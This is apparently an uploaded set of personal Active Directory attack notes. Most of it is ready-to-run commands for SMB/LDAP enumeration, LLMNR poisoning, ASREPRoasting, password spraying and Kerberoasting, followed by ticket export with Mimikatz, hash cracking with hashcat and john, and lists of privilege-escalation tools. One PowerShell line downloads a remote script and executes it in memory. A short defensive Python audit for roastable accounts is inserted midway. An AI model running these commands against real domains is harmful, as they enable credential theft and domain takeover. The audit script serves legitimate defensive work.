Windows AD Notes

Uploaded by MRX Clay

2. Enumeration (AD)
 SMB-Enumeration

Ports: 139, 445

 It's very easy to obtain all the domain usernames from Windows:

net user /domain

Get-DomainUser

wmic useraccount get name,sid

 With No Creds

nbtscan {IP}

smbmap -H {IP}

smbmap -H {IP} -u null -p null

smbclient -N -L //{IP}

smbclient -N //{IP}/ --option="client min protocol"=LANMAN1

rpcclient {IP}

rpcclient -U "" {IP}

crackmapexec smb {IP}

crackmapexec smb {IP} --pass-pol -u "" -p ""

[Link] -dc-ip {IP} "{Domain_Name}/" -all

[Link] -dc-ip {IP} -request "{Domain_Name}/" -format hashcat

[Link] -dc-ip {IP} -request "{Domain_Name}/"

[Link] -target {IP}

 With Creds

smbmap -H {IP} -u {Username} -p {Password}

smbclient -L //{IP} -U {Username} -W {Domain_Name}

smbclient -L //{IP} -U "{Username}%{NT_Hash}" -W {Domain_Name} --pw-nt-hash

crackmapexec smb {IP} -u {Username} -p {Password} --shares

[Link] {Domain_Name}/{Username}:{Password} -all

[Link] {Domain_Name}/{Username}:{Password} -request -format hashcat

[Link] {Domain_Name}/{Username}:{Password} -request


 Enum4Linux

Command: enum4linux -a {IP}

 Nmap SMB Scan 1

SMB Vuln Scan With Nmap

Command: nmap -p 139,445 -vv -Pn --script=[Link],smb-vuln-[Link],[Link],[Link],smb-vuln-ms10-[Link],[Link],[Link] {IP}

 Nmap Smb Scan 2

SMB Vuln Scan With Nmap (Less Specific)

Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}

 Check for null and Guest access on smb services

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //<DC IP>

 LDAP Enumeration

Ports: 389, 636

 Banner Grab-LDAP

Command: nmap -p 389 --script ldap-search -Pn {IP}

 LdapSearch -Base LdapSearch

Command: ldapsearch -h {IP} -x

 LdapSearch -Naming Context Dump

Attempt to get LDAP Naming Context

Command: ldapsearch -h {IP} -x -s base namingcontexts

 LdapSearch - Big Dump: needs the naming context from the previous step

Command: ldapsearch -h {IP} -x -b "{Naming_Context}"

 Poison the network


 LLMNR, NBT-NS, and mDNS Poisoning

-Gather credentials impersonating services with Responder

-Gather credentials exposing fake UPnP services with evil-SSDP


-Spoofing Scanner SSDP

-Spoofing Office365 SSDP

-Diverting User to a Password Vault SSDP

-Spoofing Microsoft Azure SSDP

 ASREPRoast

The ASREPRoast attack looks for user accounts that do not require Kerberos
pre-authentication (the DONT_REQ_PREAUTH flag in userAccountControl).

 Enumerating vulnerable users (need domain credentials)

Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView

 Request AS_REP message

-Using Linux

#Try all the usernames in [Link]

>python [Link] [Link]/ -usersfile [Link] -format hashcat -outputfile [Link]

#Use domain creds to extract targets and target them

>python [Link] [Link]/triceratops:Sh4rpH0rns -request -format hashcat -outputfile [Link]

-Using Windows

.\[Link] asreproast /format:hashcat /outfile:[Link]

Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 ([Link])

 Cracking

john --wordlist=passwords_kerb.txt [Link]

hashcat -m 18200 --force -a 0 [Link] passwords_kerb.txt

 Password Spraying
 Get password policy

If you have some user credentials or a shell as a domain user you can get the
password policy with:

crackmapexec smb <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

(Get-DomainPolicy)."SystemAccess" #From powerview

3. Exploitation
 Using crackmapexec:

crackmapexec smb <IP> -u [Link] -p [Link]

 Using kerbrute(Go)

./kerbrute_linux_amd64 passwordspray -d [Link] domain_users.txt Password123

./kerbrute_linux_amd64 bruteuser -d [Link] [Link] thoffman

 With Rubeus version with brute module:


 with a list of users

.\[Link] brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

 check passwords for all users in current domain

.\[Link] brute /passwords:<passwords_file> /outfile:<output_file>

 With the scanner/smb/smb_login module of Metasploit


 With Invoke-DomainPasswordSpray

Invoke-DomainPasswordSpray -UserList .\[Link] -Password 123456 -Verbose

4. Windows Exploitation Methods

 Hash injection / Pass-the-Hash
 Pass the Ticket - Access as a user to the domain required
 Golden Ticket - Full domain compromise (domain admin) required
 Silver Ticket - Service hash required
 Skeleton Key - Full domain compromise (domain admin) required
 Kerberoast - Access as any user required

To perform Kerberoasting, only a domain account that can request TGSs is necessary, which is
any account, since no special privileges are required. You need valid credentials inside the domain.

-From linux

-msf> use auxiliary/gather/get_user_spns

-[Link] -request -dc-ip [Link] <[Link]>/<USERNAME> -outputfile [Link] # Password will be prompted

-[Link] -request -dc-ip [Link] -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile [Link]

-From Windows, from memory to disk

- Get-NetUser -SPN | select serviceprincipalname #PowerView, get user service accounts
 Get TGS in memory

- Add-Type -AssemblyName [Link]

- New-Object [Link] -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/[Link]

 klist #List kerberos tickets in memory

- Invoke-Mimikatz -Command '"kerberos::list /export"' #Export tickets to current folder

-From Windows

-Request-SPNTicket -SPN "<SPN>" #Using PowerView Ex: MSSQLSvc/[Link]

- .\[Link] kerberoast /outfile:[Link]

- iex (new-object [Link]).DownloadString("[Link]/data/module_source/credentials/Invoke-Kerberoast.ps1")

- Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII [Link]

-Cracking

-john --format=krb5tgs --wordlist=passwords_kerb.txt [Link]

hashcat -m 13100 --force -a 0 [Link] passwords_kerb.txt

./[Link] [Link] 1-MSSQLSvc~[Link]~1433-[Link]
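Both the ASREPRoast section and the Kerberoast section above boil down to account misconfigurations a defender can audit directly: a user object with DONT_REQ_PREAUTH set, and a user account that carries a servicePrincipalName while still accepting RC4 tickets (hashcat mode 13100 is the RC4 TGS-REP format; AES tickets are far slower to crack) or while keeping a years-old password. The following is an added example, not part of the original notes: a Python audit over constructed user records in the attribute shape an LDAP export (ldapsearch or Get-DomainUser) would give. The record layout, the `pwdAgeDays` field (a pre-computed age rather than the raw pwdLastSet timestamp) and the sample accounts are assumptions; the userAccountControl and msDS-SupportedEncryptionTypes bit values are the documented AD ones.

```python
"""Audit AD user objects for ASREPRoast and Kerberoast exposure.

Added example (not from the original notes). Input records are a
constructed simplification of an LDAP export; the flag values below are
the documented Active Directory bit values.
"""

# userAccountControl bits
UAC_NORMAL_ACCOUNT = 0x0200
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_REQ_PREAUTH = 0x400000   # the flag ASREPRoast enumerates (Get-DomainUser -PreauthNotRequired)

# msDS-SupportedEncryptionTypes bits; 0 / unset means "domain default", which includes RC4
ETYPE_RC4_HMAC = 0x4
ETYPE_AES128 = 0x8
ETYPE_AES256 = 0x10

# Constructed sample records (not real directory data).
SAMPLE_USERS = [
    {"sAMAccountName": "triceratops", "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0, "pwdAgeDays": 40},
    {"sAMAccountName": "svc_sql", "userAccountControl": UAC_NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"],
     "msDS-SupportedEncryptionTypes": 0, "pwdAgeDays": 900},
    {"sAMAccountName": "svc_web", "userAccountControl": UAC_NORMAL_ACCOUNT,
     "servicePrincipalName": ["HTTP/web01.corp.example"],
     "msDS-SupportedEncryptionTypes": ETYPE_AES128 | ETYPE_AES256, "pwdAgeDays": 20},
    {"sAMAccountName": "old_admin",
     "userAccountControl": UAC_NORMAL_ACCOUNT | UAC_ACCOUNTDISABLE | UAC_DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0, "pwdAgeDays": 500},
    {"sAMAccountName": "alice", "userAccountControl": UAC_NORMAL_ACCOUNT,
     "servicePrincipalName": [], "msDS-SupportedEncryptionTypes": 0, "pwdAgeDays": 30},
]


def audit_users(users, stale_days=365):
    """Return a list of (account, finding, recommendation) tuples.

    Disabled accounts are skipped: the KDC will not issue an AS-REP or a
    TGS for them, so they are not roastable until re-enabled."""
    findings = []
    for u in users:
        name = u["sAMAccountName"]
        uac = u["userAccountControl"]
        if uac & UAC_ACCOUNTDISABLE:
            continue
        if uac & UAC_DONT_REQ_PREAUTH:
            findings.append((name, "ASREPROAST",
                             "re-enable Kerberos pre-authentication (clear DONT_REQ_PREAUTH)"))
        if u["servicePrincipalName"]:
            etypes = u["msDS-SupportedEncryptionTypes"]
            rc4_allowed = etypes == 0 or bool(etypes & ETYPE_RC4_HMAC)
            if rc4_allowed:
                findings.append((name, "KERBEROAST_RC4",
                                 "restrict the account to AES etypes; prefer a gMSA or a long random password"))
            if u["pwdAgeDays"] > stale_days:
                findings.append((name, "SPN_STALE_PASSWORD",
                                 f"password is {u['pwdAgeDays']} days old; rotate it"))
    return findings


if __name__ == "__main__":
    for account, finding, fix in audit_users(SAMPLE_USERS):
        print(f"{account:12} {finding:20} {fix}")
```

`svc_web` produces no finding even though it has an SPN: it is AES-only and its password is fresh, which is exactly the state the recommendations push every SPN-bearing user account towards.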

5. Windows Local Privilege Escalation


1. Stored Credentials

2. Windows Kernel Exploit

3. DLL Injection

4. Unattended Answer File

5. Insecure File/Folder Permissions

6. Insecure Service Permissions

7. DLL Hijacking

8. Group Policy Preferences

9. Unquoted Service Path

10. Always Install Elevated

11. Token Manipulation

12. Insecure Registry Permissions

13. Autologon User Credential

14. User Account Control (UAC) Bypass

15. Insecure Named Pipes Permissions

6. Tools

1. Mimikatz

2. Rubeus

3. Powersploit

4. Bloodhound

5. PowerView

6. Windows Exploit Suggester -[Link]

7. SessionGopher -[Link]

8. JAWS — Just Another Windows (Enum) Script -[Link]

9. windows-privesc-check -[Link]

10. Sherlock -[Link]

11. Windows Privesc Check (WPC-PS) -[Link]

12. PowerUp -[Link]

13. Metasploit Windows Gather Applied Patches

post/windows/gather/enum_patches

14. Metasploit Local Exploit Suggester Module

post/multi/recon/local_exploit_suggester

15. BeRoot -[Link]


16. Privesc -[Link]

17. Maintaining Persistence

exploit/windows/local/persistence
